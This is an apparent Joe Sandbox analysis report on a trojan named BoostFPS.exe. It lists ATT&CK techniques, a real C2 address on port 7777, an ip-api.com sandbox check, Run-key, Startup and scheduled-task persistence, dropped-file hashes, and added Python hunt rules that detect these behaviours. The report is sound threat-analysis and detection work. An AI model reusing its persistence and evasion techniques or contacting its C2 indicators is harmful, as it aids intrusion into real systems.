Gather Victim Identity Information | 1 Scripting | Valid Accounts | 12 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 21 Obfuscated Files or Information | Security Account Manager | 541 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 22 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID 1559236, sample BoostFPS.exe, start date 20/11/2024, architecture Windows, score 100), rendered here as a process tree. Numbers in parentheses are the badges the graph shows next to a process (created registry values / created files, in the order displayed).

Start
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
  DNS/IP: ip-api.com
  +- BoostFPS.exe (4)
  |    Dropped: C:\Users\user\AppData\Roaming\svchost.exe (PE32); C:\Users\user\AppData\...\BoostFPS.exe.log (CSV)
  |    Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops PE files with benign system names
  |    +- svchost.exe (1, 5)
  |    |    Network: 45.141.27.248 port 7777 (local port 49979), SPECTRAIPSpectraIPBVNL, Netherlands; ip-api.com 208.95.112.1 port 80 (local port 49704), TUT-ASUS, United States
  |    |    Signatures: Antivirus detection for dropped file; System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; 8 other signatures
  |    |    +- powershell.exe (23) -> conhost.exe   [signature: Loading BitLocker PowerShell Module]
  |    |    +- powershell.exe (23) -> conhost.exe
  |    |    +- powershell.exe -> conhost.exe
  |    |    +- 2 other processes -> conhost.exe, conhost.exe
  |    +- cmd.exe (1)
  |         +- conhost.exe
  |         +- cmd.exe (1)
  |         +- mode.com (1)
  |         +- chcp.com (1)
  +- svchost.exe
  +- svchost.exe
  +- 2 other processes

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample:
Source | Detection | Scanner | Label
BoostFPS.exe | 66% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
BoostFPS.exe | 100% | Avira | TR/Dropper.Gen
BoostFPS.exe | 100% | Joe Sandbox ML |

Dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\svchost.exe | 84% | ReversingLabs | ByteCode-MSIL.Ransomware.CryptConsole

Unpacked PE files: No Antivirus matches

Domains: No Antivirus matches

URLs:
Source | Detection | Scanner | Label
http://wwwft.com/pkiops/crProPCA2011_2011-l0a | 0% | Avira URL Cloud | safe
https://Token.dll | 0% | Avira URL Cloud | safe
https://go.microsoft.co_ | 0% | Avira URL Cloud | safe
http://wwoft.com/pkiops/c | 0% | Avira URL Cloud | safe
45.141.27.248 | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high

Contacted URLs / IPs:
Name | Malicious | Antivirus Detection | Reputation
45.141.27.248 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | | high
URLs found in memory or binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000011.00000002.2706955560.0000027077B70000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mic | powershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://wwwft.com/pkiops/crProPCA2011_2011-l0a | powershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.microsoft.co_ | powershell.exe, 00000008.00000002.2201726247.000001DBF867A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://Token.dll | powershell.exe, 00000011.00000002.2700888169.0000027077893000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft. | powershell.exe, 00000011.00000002.2706284204.0000027077A55000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.micft.cMicRosof | powershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://wwoft.com/pkiops/c | powershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | svchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
45.141.27.248 | unknown | Netherlands | 62068 | SPECTRAIPSpectraIPBVNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559236
Start date and time: 2024-11-20 10:36:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BoostFPS.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@32/23@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 12.5%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 108
                                                      • Number of non-executed functions: 4
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                      • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target BoostFPS.exe, PID 5252 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 3364 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4164 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 2704 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 4748 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 6292 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 6968 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • VT rate limit hit for: BoostFPS.exe
Time | Type | Description
04:37:09 | API Interceptor | 57x Sleep call for process: powershell.exe modified
04:38:06 | API Interceptor | 108x Sleep call for process: svchost.exe modified
04:38:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
04:38:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
04:38:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
10:38:06 | Task Scheduler | Run new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
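The timeline above shows the three persistence mechanisms (Run key, Startup-folder link, scheduled task) all pointing at a file called svchost.exe under the user's AppData, and the network table shows that same file calling 45.141.27.248 on port 7777 and querying ip-api.com for the "hosting" field. The following hunt logic is an added example, not Joe Sandbox output and not code from the sample: it encodes the checks behind the report's "Files With System Process Name In Unsuspected Locations", "Suspect Svchost Activity" and "Potentially Suspicious Malware Callback Communication" findings and runs them over constructed event records modelled on this report (the event-dict shape, the system-process baseline and the two benign control records are this example's own assumptions).

```python
"""Hunt logic for the persistence and callback pattern this report documents.

Added example, not Joe Sandbox output and not code from the sample.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Process names Windows itself only runs from its system directories.
# Constructed baseline for this example; extend it from your own environment.
SYSTEM_PROCESS_NAMES = {
    "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
    "services.exe", "smss.exe", "wininit.exe", "dwm.exe",
}

# Directories in which those names are legitimate (lower-case, no trailing slash).
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# The report's data-centre check: an ip-api.com "hosting" field lookup.
HOSTING_LOOKUP_RE = re.compile(r"ip-api\.com/line/\?fields=hosting", re.I)

# Destination ports on which an outbound connection is not unusual by itself.
COMMON_PORTS = {80, 443}


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def _norm(path: str) -> str:
    return path.strip().strip('"').lower()


def _in_trusted_dir(path: str) -> bool:
    p = _norm(path)
    return any(p.startswith(d + "\\") for d in TRUSTED_DIRS)


def check_image_path(path: str) -> Finding | None:
    """System File Execution Location Anomaly: a system-process name that
    lives outside System32/SysWOW64 (e.g. ...\\AppData\\Roaming\\svchost.exe)."""
    name = _norm(path).rsplit("\\", 1)[-1]
    if name in SYSTEM_PROCESS_NAMES and not _in_trusted_dir(path):
        return Finding("system_process_name_in_unexpected_location", _norm(path))
    return None


def check_autostart(kind: str, name: str, target: str) -> list[Finding]:
    """Run key, Startup-folder link or scheduled task whose target is a
    masquerading binary (the three persistence entries in the timeline)."""
    if check_image_path(target) is None:
        return []
    return [Finding(f"autostart_{kind}_to_masquerading_binary", f"{name} -> {target}")]


def check_network(image: str, dst_ip: str, dst_port: int, url: str = "") -> list[Finding]:
    """Outbound traffic from a masquerading binary to a non-standard port, and
    the ip-api.com hosting lookup used to recognise sandboxes and VPS hosts."""
    findings: list[Finding] = []
    if check_image_path(image) is not None and dst_port not in COMMON_PORTS:
        findings.append(Finding("callback_from_masquerading_binary",
                                f"{image} -> {dst_ip}:{dst_port}"))
    if url and HOSTING_LOOKUP_RE.search(url):
        findings.append(Finding("hosting_ip_lookup", f"{image} -> {url}"))
    return findings


def hunt(events: list[dict]) -> list[Finding]:
    """Run every check over a list of event dicts (the dict shape is this example's own)."""
    out: list[Finding] = []
    for e in events:
        if e["type"] == "autostart":
            out.extend(check_autostart(e["kind"], e["name"], e["target"]))
        elif e["type"] == "network":
            out.extend(check_network(e["image"], e["dst_ip"], e["dst_port"], e.get("url", "")))
    return out


# Constructed events modelled on this report's timeline and network tables,
# plus two benign controls (an ordinary Run entry and the real svchost.exe on 443).
PAYLOAD = r"C:\Users\user\AppData\Roaming\svchost.exe"
SAMPLE_EVENTS = [
    {"type": "autostart", "kind": "runkey",
     "name": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost", "target": PAYLOAD},
    {"type": "autostart", "kind": "startup_lnk",
     "name": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk",
     "target": PAYLOAD},
    {"type": "autostart", "kind": "schtask", "name": "svchost", "target": PAYLOAD},
    {"type": "autostart", "kind": "runkey",  # benign control (constructed)
     "name": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Example",
     "target": r"C:\Program Files\Example\example.exe"},
    {"type": "network", "image": PAYLOAD, "dst_ip": "45.141.27.248", "dst_port": 7777},
    {"type": "network", "image": PAYLOAD, "dst_ip": "208.95.112.1", "dst_port": 80,
     "url": "http://ip-api.com/line/?fields=hosting"},
    {"type": "network", "image": r"C:\Windows\System32\svchost.exe",  # benign control (constructed)
     "dst_ip": "203.0.113.10", "dst_port": 443},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.evidence}")
```

Run over the constructed records, hunt() returns five findings: the three autostart entries, the port-7777 callback and the hosting lookup; the two control records produce nothing. The port check alone would miss the ip-api.com request (it goes to port 80), which is why the hosting-lookup pattern is a separate rule.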
Context for IP 208.95.112.1:
Associated Sample Name / URL | Detection | Threat Name | Context
New_Order_Inquiry.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | ip-api.com/line/?fields=hosting
DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | ip-api.com/line/?fields=hosting
file.exe | malicious | Unknown | ip-api.com/line/
file.exe | malicious | Unknown | ip-api.com/line/
FACTER9098767800.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
[Purchase Order] PO2411024.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
Wire slip account payable.pif.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
file.exe | malicious | Clipboard Hijacker | ip-api.com/line/

Context for domain ip-api.com:
Associated Sample Name / URL | Detection | Threat Name | Context
New_Order_Inquiry.exe | malicious | AgentTesla | 208.95.112.1
seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 208.95.112.1
DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | 208.95.112.1
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 208.95.112.1
file.exe | malicious | Unknown | 208.95.112.1
file.exe | malicious | Unknown | 208.95.112.1
paket teklif.exe | malicious | AgentTesla | 208.95.112.1
FACTER9098767800.exe | malicious | AgentTesla | 208.95.112.1
[Purchase Order] PO2411024.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
Wire slip account payable.pif.exe | malicious | AgentTesla | 208.95.112.1

Context for ASN SPECTRAIPSpectraIPBVNL:
Associated Sample Name / URL | Detection | Threat Name | Context
bPRQRIfbbq.exe | malicious | Unknown | 45.138.16.44
4Fm0sK0yKz.exe | malicious | AsyncRAT | 45.141.215.18
Payload 94.75 (3).225.exe | malicious | Unknown | 45.141.215.40
Payload 94.75 (2).225.exe | malicious | Unknown | 45.141.215.116
Payload 94.75 (3).225.exe | malicious | Unknown | 45.138.16.76
Payload 94.75 (2).225.exe | malicious | Unknown | 45.141.215.21
Payload 94.75.225.exe | malicious | Unknown | 45.141.215.61
https://alcatrazpackages.com/elchapo.html | malicious | Unknown | 45.87.42.74
la.bot.mipsel.elf | malicious | Unknown | 45.141.201.6
na.elf | malicious | Unknown | 45.142.6.235

Context for ASN TUT-ASUS:
Associated Sample Name / URL | Detection | Threat Name | Context
New_Order_Inquiry.exe | malicious | AgentTesla | 208.95.112.1
seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 208.95.112.1
DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | 208.95.112.1
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 208.95.112.1
file.exe | malicious | Unknown | 208.95.112.1
file.exe | malicious | Unknown | 208.95.112.1
http://ok.clicknowvip.com | malicious | Unknown | 162.252.214.5
paket teklif.exe | malicious | AgentTesla | 208.95.112.1
FACTER9098767800.exe | malicious | AgentTesla | 208.95.112.1
[Purchase Order] PO2411024.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\BoostFPS.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):654
                                                      Entropy (8bit):5.380476433908377
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                      Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):654
                                                      Entropy (8bit):5.380476433908377
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
                                                      Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):41
                                                      Entropy (8bit):3.7195394315431693
                                                      Encrypted:false
                                                      SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                      MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                      SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                      SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                      SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                      Malicious:false
                                                      Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
